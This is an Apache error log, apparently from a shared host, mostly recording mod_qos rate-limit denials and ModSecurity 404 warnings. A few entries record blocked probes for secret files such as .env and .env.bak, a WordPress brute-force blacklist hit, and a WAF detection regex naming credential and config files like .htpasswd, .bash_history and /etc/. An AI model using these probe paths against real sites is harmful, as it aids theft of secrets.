[Tue May 26 19:53:52.739579 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwDwAAAJ8
[Tue May 26 19:53:52.741221 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwEAAAAKM
[Tue May 26 19:53:52.745464 2026] [qos:error] [pid 86490:tid 86713] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwEQAAAOI
[Tue May 26 19:53:52.753456 2026] [qos:error] [pid 93576:tid 93810] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL6gAAAGI
[Tue May 26 19:53:52.767948 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwEgAAAJE
[Tue May 26 19:53:52.772334 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwEwAAAMo
[Tue May 26 19:53:52.885401 2026] [qos:error] [pid 86490:tid 86658] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwFQAAAKs
[Tue May 26 19:53:52.887565 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL7AAAAB4
[Tue May 26 19:53:52.888179 2026] [qos:error] [pid 86490:tid 86746] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwFgAAAQM
[Tue May 26 19:53:52.890686 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL7QAAACA
[Tue May 26 19:53:52.894826 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwFwAAAKA
[Tue May 26 19:53:52.896318 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwGAAAAJ8
[Tue May 26 19:53:52.897218 2026] [qos:error] [pid 86490:tid 86650] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-FZMwN0DpLVWo6KwGQAAAKM
[Tue May 26 19:53:52.901157 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-GDRMqfxdEDkoszL7gAAAC0
[Tue May 26 19:53:53.003435 2026] [qos:error] [pid 86490:tid 86685] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwGgAAAMY
[Tue May 26 19:53:53.004737 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwGwAAAJE
[Tue May 26 19:53:53.035853 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszL7wAAADY
[Tue May 26 19:53:53.037420 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwHAAAANo
[Tue May 26 19:53:53.038726 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwHQAAANk
[Tue May 26 19:53:53.042758 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszL8AAAAGg
[Tue May 26 19:53:53.049053 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszL8QAAACM
[Tue May 26 19:53:53.049287 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwHgAAAJ4
[Tue May 26 19:53:53.051812 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwHwAAAP8
[Tue May 26 19:53:53.063123 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwIAAAAM0
[Tue May 26 19:53:53.182141 2026] [security2:error] [pid 93868:tid 94299] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/railway/.env"] [unique_id "ahWs-UqK9k_ZUB2Vp25E8QAAAbg"]
[Tue May 26 19:53:53.236189 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwJAAAAI8
[Tue May 26 19:53:53.236884 2026] [qos:error] [pid 86490:tid 86689] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwJQAAAMo
[Tue May 26 19:53:53.237152 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35254] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszL8gAAABA
[Tue May 26 19:53:53.238556 2026] [qos:error] [pid 86490:tid 86662] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwJgAAAK8
[Tue May 26 19:53:53.240421 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwJwAAANo
[Tue May 26 19:53:53.246127 2026] [qos:error] [pid 93576:tid 93791] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszL9AAAAE8
[Tue May 26 19:53:53.246799 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszL9QAAAEo
[Tue May 26 19:53:53.256572 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34946] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwKAAAANk
[Tue May 26 19:53:53.260058 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwKQAAAJ4
[Tue May 26 19:53:53.261673 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwKgAAAP8
[Tue May 26 19:53:53.279973 2026] [security2:error] [pid 86490:tid 86724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvfQAAAO0"]
[Tue May 26 19:53:53.280558 2026] [security2:error] [pid 93868:tid 94309] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EygAAAcI"]
[Tue May 26 19:53:53.285788 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EzgAAAcc"]
[Tue May 26 19:53:53.288423 2026] [security2:error] [pid 86490:tid 86717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvaAAAAOY"]
[Tue May 26 19:53:53.298345 2026] [security2:error] [pid 93867:tid 94038] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrqgAAASI"]
[Tue May 26 19:53:53.304525 2026] [security2:error] [pid 86490:tid 86691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvbgAAAMw"]
[Tue May 26 19:53:53.307784 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs92DRMqfxdEDkoszLxAAAAFo"]
[Tue May 26 19:53:53.310031 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvcQAAAPc"]
[Tue May 26 19:53:53.315438 2026] [security2:error] [pid 93867:tid 94159] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrpAAAAWE"]
[Tue May 26 19:53:53.318291 2026] [security2:error] [pid 93868:tid 94311] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25EzAAAAcQ"]
[Tue May 26 19:53:53.323607 2026] [security2:error] [pid 93867:tid 94110] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrrAAAAUo"]
[Tue May 26 19:53:53.326348 2026] [security2:error] [pid 86490:tid 86665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvbAAAALI"]
[Tue May 26 19:53:53.340423 2026] [security2:error] [pid 93867:tid 94030] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrqwAAARo"]
[Tue May 26 19:53:53.350156 2026] [security2:error] [pid 93867:tid 94024] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrqQAAARQ"]
[Tue May 26 19:53:53.356387 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs91ZMwN0DpLVWo6KvhAAAAOQ"]
[Tue May 26 19:53:53.359746 2026] [security2:error] [pid 93867:tid 94120] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-JCDfrjqoHpuuBKrtAAAAU8"]
[Tue May 26 19:53:53.360911 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvyAAAAQQ"]
[Tue May 26 19:53:53.385822 2026] [security2:error] [pid 93867:tid 94018] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-JCDfrjqoHpuuBKrsgAAAQ4"]
[Tue May 26 19:53:53.388925 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvxwAAALE"]
[Tue May 26 19:53:53.391225 2026] [security2:error] [pid 93867:tid 94214] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrrQAAAXk"]
[Tue May 26 19:53:53.392698 2026] [security2:error] [pid 86490:tid 86708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvxgAAAN0"]
[Tue May 26 19:53:53.397456 2026] [security2:error] [pid 86490:tid 86694] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvxQAAAM8"]
[Tue May 26 19:53:53.399775 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs90qK9k_ZUB2Vp25E0gAAAbw"]
[Tue May 26 19:53:53.412591 2026] [security2:error] [pid 93867:tid 94231] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs95CDfrjqoHpuuBKrpQAAAYE"]
[Tue May 26 19:53:53.420076 2026] [security2:error] [pid 93576:tid 93794] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL3gAAAFI"]
[Tue May 26 19:53:53.424582 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL1AAAACs"]
[Tue May 26 19:53:53.425825 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvxAAAALM"]
[Tue May 26 19:53:53.427432 2026] [security2:error] [pid 93868:tid 94259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-EqK9k_ZUB2Vp25E3QAAAZA"]
[Tue May 26 19:53:53.447876 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv4wAAANw"]
[Tue May 26 19:53:53.447995 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-GDRMqfxdEDkoszL3wAAAHI"]
[Tue May 26 19:53:53.465016 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-EqK9k_ZUB2Vp25E3gAAAZk"]
[Tue May 26 19:53:53.468967 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6Kv3wAAANE"]
[Tue May 26 19:53:53.475481 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs-FZMwN0DpLVWo6KvyQAAAMg"]
[Tue May 26 19:53:53.567883 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszMBQAAAGk
[Tue May 26 19:53:53.573433 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwYAAAAM8
[Tue May 26 19:53:53.576408 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwYQAAANU
[Tue May 26 19:53:53.579765 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwYgAAAKk
[Tue May 26 19:53:53.582100 2026] [qos:error] [pid 86490:tid 86624] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwYwAAAIk
[Tue May 26 19:53:53.594466 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwZAAAAJw
[Tue May 26 19:53:53.598175 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwZQAAAPw
[Tue May 26 19:53:53.618815 2026] [qos:error] [pid 86490:tid 86648] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwZgAAAKE
[Tue May 26 19:53:53.621968 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwZwAAAPA
[Tue May 26 19:53:53.634703 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwaAAAAIo
[Tue May 26 19:53:53.720858 2026] [qos:error] [pid 93576:tid 93718] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-WDRMqfxdEDkoszMBgAAAAY
[Tue May 26 19:53:53.723587 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwaQAAAJg
[Tue May 26 19:53:53.727507 2026] [qos:error] [pid 86490:tid 86719] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwagAAAOg
[Tue May 26 19:53:53.730595 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:35158] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwawAAAM4
[Tue May 26 19:53:53.732887 2026] [qos:error] [pid 86490:tid 86734] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwbAAAAPc
[Tue May 26 19:53:53.743313 2026] [qos:error] [pid 86490:tid 86707] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwcQAAANw
[Tue May 26 19:53:53.746458 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwcgAAAKU
[Tue May 26 19:53:53.771923 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwdAAAAPs
[Tue May 26 19:53:53.774765 2026] [qos:error] [pid 86490:tid 86633] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwdQAAAJI
[Tue May 26 19:53:53.786287 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs-VZMwN0DpLVWo6KwdgAAAPY
[Tue May 26 19:53:54.006396 2026] [security2:error] [pid 93867:tid 93910] [remote 38.95.35.74:48790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWs-ZCDfrjqoHpuuBKr1gABXCc"]
[Tue May 26 19:53:54.026109 2026] [security2:error] [pid 93868:tid 94373] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/%2f/s3/.env.bak"] [unique_id "ahWs-kqK9k_ZUB2Vp25FCwAAAgI"]
